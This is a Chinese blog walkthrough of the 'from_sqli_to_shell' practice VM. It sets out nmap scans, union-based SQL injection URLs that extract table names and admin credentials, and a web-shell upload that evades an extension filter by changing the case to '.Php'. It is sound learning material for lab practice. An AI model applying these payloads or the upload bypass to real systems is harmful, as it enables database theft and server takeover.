from_sqli_to_shell靶机初体验

最新推荐文章于 2023-11-05 17:07:35 发布
最新推荐文章于 2023-11-05 17:07:35 发布
阅读量1.1k 收藏 2
点赞数 2
文章标签: mysql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38390532/article/details/125915239
版权

from_sqli_to_shell靶机初体验

前期准备

1.安装好from_sqli_to_shell和kali(这里我用kali2022)

2.设置两台虚拟机网络适配器为–仅主机模式

3.查看虚拟网络编辑器

在这里插入图片描述

4.开机!

实战演练

信息收集

不知道靶机的IP地址,但是因为设置了仅主机模式,只知道他所处的网段192.168.20.0/24,所以可以在kali上扫描主机,这里用到的命令是

nmap -sn 192.168.20.0/24

在这里插入图片描述

显而易见,靶机的ip地址为192.168.20.130

现在,我们需要查看靶机开了什么服务,相应的命令是

nmap -sS -sV -T4 -A -p- 192.168.20.130

在这里插入图片描述

从结果可以看出,靶机开了80端口,我们可以试着用网站访问一下

Attack!!

我们访问他的网站

Screenshot 2022-07-21 111203

凭着直觉,点击了Admin,出现的页面是一个登录界面

Screenshot 2022-07-21 111318

在尝试了各种办法,都无法登录(那就是我太菜了),直觉告诉我,这是一个后台管理的登录界面。想要登录成功,得先找到用户名和密码。

既然这里注入不了,难道就没有其他办法了吗?

别急,还没看完呢

在导航栏的这几个页面中我们可以看到url有可能存在sql注入

在这里插入图片描述

Screenshot 2022-07-21 111438

我们开始尝试注入,判断字段长度

http://192.168.20.130/cat.php?id=1 and 1=1 order by 4--+

Screenshot 2022-07-21 114038

所以字段数为4

接下来就是判断回显位置,我们试着输入

http://192.168.20.130/cat.php?id=1 and 1=1 union select 1,2,3,4--+

在这里插入图片描述

回显位置就出来了。现在,我们开始我们的sql注入之旅

手工注入

查看mysql数据库版本

http://192.168.20.130/cat.php?id=1 and 1=1 union select 1,version(),3,4--+

在这里插入图片描述

注:5.0以上有information_schema

查看当前数据库名字

http://192.168.20.130/cat.php?id=1 and 1=1 union select 1,database(),3,4--+

Screenshot 2022-07-21 115022

补充知识

  1. information_schema:表示所有信息,包括库、表、列
  2. information_schema.tables:记录所有表名信息的表
  3. information_schema.columns:记录所有列名信息的表
  4. table_schema:数据库的名称
  5. table_name:表名
  6. column_name:列名

接下来是查找数据库photoblog的表名

http://192.168.20.130/cat.php?id=1 and 1=1 union select 1,table_name,3,4 from information_schema.tables where table_schema='photoblog'--+

Screenshot 2022-07-21 115155

既然是后台登录密码,那肯定是users表啦,问就是直觉哈哈

确定是users表后,就开始查users的列名

http://192.168.20.130/cat.php?id=1 and 1=1 union select 1,column_name,3,4 from information_schema.columns where table_schema='photoblog' and table_name='user'--+

Screenshot 2022-07-21 115359

http://192.168.20.130/cat.php?id=1 and 1=1 union select 1,login,3,4 from photoblog.users--+

Screenshot 2022-07-21 115517

http://192.168.20.130/cat.php?id=1 and 1=1 union select 1,password,3,4 from photoblog.users--+

在这里插入图片描述

查到密码是一段加密后的代码,我们放进md5进行解密

在这里插入图片描述

这时候用户名和密码都出来了

admin

P4ssw0rd

我们满怀信心得登录,最终成功了,进入了管理后台页面。

在这里插入图片描述

文件上传

Screenshot 2022-07-21 120048

在这里插入图片描述

啊哈,被我们发现了一个疑似文件上传的漏洞,坏心思涌上心头。上传个小马,用菜刀连接一下

Screenshot 2022-07-21 120224

Screenshot 2022-07-21 120306

没想象到靶机对php进行了过滤

那么既然有过滤,就有绕过。我们先试一下大小写。

用burpsuit拦截一下,如图

在这里插入图片描述

我们把php改成Php尝试一下,放行。

结果成功上传了,不得不说这个过滤还是有点走心的。
在这里插入图片描述

接下来该怎么办,如何知道上传的路径?

我想了想,kali不是有一个dirb扫描网站目录吗?

我立马去搜了一下相关命令

dirb http://192.168.20.130

Screenshot 2022-07-21 121354

我们发现有一个名为uploads的目录。这时候发挥一下想象力,这不就是上传吗?而且整个网站只有一个上传文件的地方,所以说,abc.Php很有可能在这里。

 dirb http://192.168.20.130/admin/uploads -w -X .Php

在这里插入图片描述

不出所料,我们立刻用菜刀连接,配置如下

菜刀1
在这里插入图片描述

我们上传一个文件看看

在这里插入图片描述

Screenshot 2022-07-21 135932

成功了,nice!

总结

这次靶机总体来说难度不高,基础入门。

本人也很菜,技术嘛,刚入门吧,如果大佬们觉得我做的不好的地方,欢迎指出,虚心请教。

Leon.Luo
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
From SQL Injection to Shell学习笔记
06-08
pentesterlab的From SQL Injection to Shell模块学习经验
vulnhub笔记:from_sqli_to_shell
X
07-03 453
信息收集 端口扫描 # nmap -p- -sC -sV 192.168.111.141 -oA scans/allport Nmap scan report for 192.168.111.141 Host is up (0.00043s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.
[Pentester Lab]from_sql_to_shell靶机
Re1_zf的博客
10-11 720
由此得到的这个账号密码可能就是上面那个登录页面的账号密码,而且这里sqlmap也直接给解密了密码的md5值。这个表是一个图片表,名称是一个herf,可以直接查看,后面的delete应该也是可以删除这张图片。测试一下注入点,页面的内容发生了改变,并且改编成的页面内容跟预期是一样的。首先找到一个传参的页面,记好测试前的页面的状态,然后开始测试。上传成功,检测机制不会涉及到内容,可能只是单纯的文件后缀检测。页面有些简单,但是众所周知,越简单的页面越恐怖,继续往下看。想办法上传一个可以以php格式解析的文件。
111
jackcily的博客
11-17 740
拓展:burp suite 攻击分为三步: 1.Fingerprinting 需要收集什么信息? web application and technology in use 什么手段? 在进行实验之前,首先使用nmap 扫描一下 victim 对外开放的端口 nmap 10.0.2.10 扫描结果如下: Starting Nmap 7.70 ( https://nmap.org ) at 2018...
[SQL注入1]From SQL injection to Shell
weixin_30268071的博客
04-03 151
第一次写,希望大神们多指点。 对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习。网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTERLAB,网址如下:http://www.pentesterlab.com/ 刚开始学,我碰到很多困难,如对数据库不够熟悉,对PHP不熟悉,对各种大神的工具不熟悉。积沙成塔,滴水穿石,我们一步一步...
SQLi Dumper v.8.3_sqli_
09-30
SQLI Dumper v8.3SQLI Dumper v8.3
Vega_sqli_源码
10-04
sqli tool for searching vulnarabiliti for your website
Dedecms_20150618_member_sqli (2).py
10-05
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
新版PHPStudy可用sqli_labs 靶机.zip
03-01
在新版PHPStudy中可以使用的sqli_labs SQL注入靶机。 直接解压压缩包,然后把安装包放在WWW根目录下。 找到\phpstudy_pro\WWW\Sqli_Edited_Version-master\sqlilabs\sql-connections找到这个目录下的db-creds.inc ...
《Beyond_SQLi_Obfuscate_and_Bypass》.pdf
11-28
总的来说,《Beyond SQLi: Obfuscate and Bypass》是一篇深入解析SQL注入攻击策略的宝贵资源,它揭示了攻击者如何巧妙地规避安全措施,并为防御者提供了对抗这些攻击的思路和实践建议。对于网络安全专业人士来说,...
From SQL injection to shell II
cnbird's blog
06-20 1273
https://pentesterlab.com/from_sqli_to_shell_II.html
[Pentester Lab]From SQL Injection to Shell
CD的博客
04-07 643
本文翻译了[Pentester Lab]From SQL Injection to Shell的要点,记录了笔者按照教程进行复现的过程。 By the way,庆祝一下自己拿到的第一个Web Shell(虽然是靶机233333 1. 介绍 实验目的: 在基于PHP的网站中使用SQL注入,以及攻击者如何使用SQL注入获取管理员界面的访问权限。然后,攻击者可以在Server上实现代码执行...
vulnhub之from_sqli_to_shell_II_i386
li1136594919的博客
04-15 326
发现新增IP:192.168.62.141。
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4011
一次简单的SQL注入靶场练习
SQL注入实验靶场(附环境)
m0_74025111的博客
11-05 383
​ 扫出了一个库,证明信息就在这个库里面,得知信息在此库里面就好办了,直接爆表和字段信息sqlmap -u http://192.168.171.131/cat.php?​ 是一个登录页面,我们不知道密码,那我们就通过数据库来进行获取信息,在前面的源码中发现存在id参数注入,测试一下该靶场是否存在sql注入。页面没有什么可用的资源,查看源码,从源码可以发现是存在id参数注入,文件上传。进入到上传目录,发现了这个页面存在图片和信息类的,还有相关的路径。通过路径还可以发现有admin目录的,直接访问一手。
PentesterLab渗透演练平台
weixin_33695450的博客
04-02 927
转载自: https://www.blackh4t.org/archives/1143.html http://www.91ri.org/5958.html web for pentester是国外安全研究者开发的的一款web渗透测试平台(环境) 通过该平台你可以了解到常见的Web漏洞检测技术。 1、什么是WebAp...
from injection shell sql to_shell 传参实现hive循环跑数
weixin_39884412的博客
12-08 287
在自动调度系统没有建设成熟的环境里,数据分析师如果要提取历史很长一段时间数据,且代码比较复杂,常规操作需要我们手动执行;但是借助shell传参给hive,可以实现hive自动循环跑数,减少手动执行,大幅提升效率。以下两段code为例,说明一下跑数时间长度为每天和时间长度为一段时间两种执行情况。1、跑数时间为每天start_date=20180101end_date=20180131w...
mysql 执行拼接命令_转 【MySQL】常用拼接语句 shell 下执行mysql 命令
weixin_33660045的博客
01-19 184
MySQL】常用拼接语句前言:在MySQL中 CONCAT ()函数用于将多个字符串连接成一个字符串,利用此函数我们可以将原来一步无法得到的sql拼接出来,在工作中也许会方便很多,下面主要介绍下几个常用的场景。注:适用于5.7版本 低版本可能稍许不同。1.拼接查询所有用户mysql">SELECT DISTINCTCONCAT('User: \'',USER,'\'@\'',HOST,'\...
sh mysql_shell界面执行mysql命令
weixin_28814457的博客
01-18 226
mysql -uroot -poRcl_123 -Dsnsdb_test -e "select host from user;"mysql -uroot -poRcl_123 -Dmysql -e "show variables like '%Thread%';"mysql -uroot -poRcl_123 -Dmysql -e "show status like '%Threads_conne...
宏景 get_org_tree-sqli
最新发布
11-30
宏景 get_org_tree-sqli是一种SQL注入攻击。在宏景软件的get_org_tree函数中,存在着未经过滤或者验证的用户输入,导致攻击者可以通过构造恶意的SQL查询语句来对数据库进行未授权的访问和操作。 当应用程序没有正确地对用户输入进行过滤、转义或验证时,攻击者可以利用这个漏洞构造恶意的输入来执行SQL查询语句。攻击者可以注入SQL代码,修改数据库查询语句的逻辑,获取、删除或修改数据库中的数据,甚至完全控制数据库服务器。 为了防止宏景 get_org_tree-sqli攻击,开发人员应该始终遵循安全的编码实践。 1. 输入验证和过滤:应该对所有的用户输入进行验证和过滤,确保输入数据符合预期的格式和类型。可以使用合适的输入验证函数或正则表达式来实现。 2. 使用参数化查询或预处理语句:建议使用参数化查询或预处理语句来执行数据库查询操作,而不是直接拼接用户输入构成的查询语句。参数化查询可以防止SQL注入攻击。 3. 最小权限原则:数据库账户应该按照最小权限原则进行授权,避免给予不必要的权限。这样即使发生了SQL注入攻击,攻击者也只能执行有限的操作。 4. 错误信息处理:避免将详细的错误信息直接输出到用户界面上,这样可能会暴露敏感的数据库结构和错误详情,为攻击者提供攻击的线索。可以将错误信息记录在日志文件中,以便日后的安全审计和调查。 通过以上措施,开发人员可以提高应用程序的安全性,防止宏景 get_org_tree-sqli等SQL注入攻击对系统造成威胁。同时,定期对应用程序进行安全测试和漏洞扫描,及时修复和更新系统中发现的安全漏洞,保障系统安全运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值